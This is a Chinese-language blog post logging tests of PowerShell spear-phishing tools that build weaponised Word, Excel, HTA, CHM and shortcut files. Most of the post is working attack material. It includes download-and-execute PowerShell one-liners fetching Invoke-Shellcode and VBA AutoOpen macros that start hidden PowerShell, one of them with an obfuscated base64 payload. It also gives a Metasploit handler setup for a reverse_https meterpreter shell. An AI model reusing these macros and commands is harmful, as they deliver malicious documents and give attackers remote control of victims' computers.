Spear Phishing with Powershell

發表於 2016-01-15   |   分類於 信息安全   |  

测试环境

Windows 8.1
x64

Client 模块测试

Out-Word

测试失败,word未生成

1
Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-HTA

测试失败,执行HTA文件后,shellcode未执行

1
Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-Excel

测试成功

1
Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-Shortcut

payload过长,测试失败。可以考虑和某些快捷方式漏洞配合使用

1
Out-Shortcut -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-CHM

测试失败。执行chm文件后,shellcode未执行

1
Out-CHM -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

更换路径测试,仍然失败

1
Out-CHM -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force" -HHCPath "E:\HTML Help Workshop"

Out-Java

需要JDKPath,感觉利用场景有限,放弃实验

1
Out-Java -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force"

Out-WebQuery

由于测试环境限制,未测试。如果成功的话应该是一个比较有效的手法。

vbs script

参考视频[1],提供OneDrive下载。

此处powershell的脚本也被混淆了。

base64加密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Sub AutoOpen()
Execute
End Sub
     Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TZFda8IwFIbvB/sPh9KNhNnQdlM2y4StbEMYKquwC/EitgebWavYM1TU/76ktZ25ySG8H08SO84U5gTPMMCtM5z9YEwQ7QvCpRggiWgVL5AKMQ5HYalklvfkC6/zKDzhub7VetCLB3ZBG5RLnWNXieIDKSrPGA8msz3hZDq1zV5okStEp92+bx9vDu4p2KYqQ8ZsZexVkPhCmbBK3wK3BdUoPjGfU8o5ODmCyw+BnUiS2scu+J3xfo0DucT6JmPckXiJwn7/LY9Xicrn/Mynx7rFlChzE8yTmYwXJlThDqoGv3frwRGGv+RUNriQ+lCS18Y7sEYRWHpn623CxUhSag57YJ09utDET8iA4Zlp2u2WjCXbq2Fi/w3NE4vvjSJkTY7mbub6eRrte/ZbpIyfgvpXwmxVIOPXV38=')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();", Null, objConfig, intProcessID
     End Function

未混淆版本

其他从vbs调用powershell的方法可以参考[3]、[4]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Sub Auto_Open()
Execute
End Sub
     Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force", Null, objConfig, intProcessID
     End Function

Invoke-ShellCode

在git仓库里找一下早期版本的 Invoke-Shellcode,应该有如下使用方式,参考视频[2]

1
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.100 -Lport 4444

版本更改日志,回滚到 142afad54ea82ea385c4d8262de6a532d3206080

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
commit 7f6d3a4565643e954970405817052f5cbe75836b
Author: Matt Graeber <mattgraeber@gmail.com>
Date:   Mon Dec 14 11:02:14 2015 -0800
    Fix Invoke-Shellcode OS architecture detection
    Fixes issue #70
commit 5065810c071a7cdbe5bd28384d35f0b8a90cabeb
Author: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date:   Thu Nov 5 10:31:40 2015 -0500
    Removing Metasploit integration from Invoke-Shellcode
    This should have only ever been a shellcode runner. Those wishing to
    integrate this with Metasploit should generate a shellcode payload with
    msfvenom.
commit d0fff7b6371ccb52952268f47ae68e85c3aeeb91
Author: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date:   Wed Nov 4 14:56:46 2015 -0500
    Migrating everything back to Invoke-Shellcode.ps1. I'm done making my point now. :P
diff --git a/CodeExecution/Invoke-Shellcode.ps1 b/CodeExecution/Invoke-Shellcode.ps1
index 6ca6def..87e2e84 100644
--- a/CodeExecution/Invoke-Shellcode.ps1
+++ b/CodeExecution/Invoke-Shellcode.ps1
commit 142afad54ea82ea385c4d8262de6a532d3206080
Author: mattifestation <mattgraeber@gmail.com>
Date:   Tue Feb 3 21:47:05 2015 -0500
    Added parameters back to the original Invoke-Shellcode

使用 Meterpreter Shellcode时 服务端的配置

1
2
3
4
5
6
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 121.121.123.198
set LPORT 4444
set ExitOnSession false
exploit -j

关于Lhost 和 Rhost

Lhost一般指控制端ip,Rhost一般指的是被控端ip。

内网环境的外网控制

利用服务器公网IP,或者做路由端口映射。

Powershell Script

例一

1
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force

例二

1
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 121.121.121.21 -Lport 4444 -Force

WPS phishing

可以参考这个CVE-2013-3934。WPS 2012版是受影响的,不过在WPS 2016中应该已经修复。还有一个更早的CVE-2012-4886,目测早已被修复。

关于shellcode的进一步计划

http://drops.wooyun.org/papers/4751
http://drops.wooyun.org/tips/4413
http://www.freebuf.com/news/special/60758.html

参考资料

[1] PowerSploit controlando Windows 8.1 Pro con MACRO de Excel
[2] PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk
[3] How to Use VBScript to Run a PowerShell Script
[4] Running Powershell from vbs with command as parameter
[5] WPS Phishing
[6] POWERSHELL内网渗透实例

#BypassAV #Phishing #Powershell
Spear Phishing with Powershell Day 2
Week of PowerShell Shells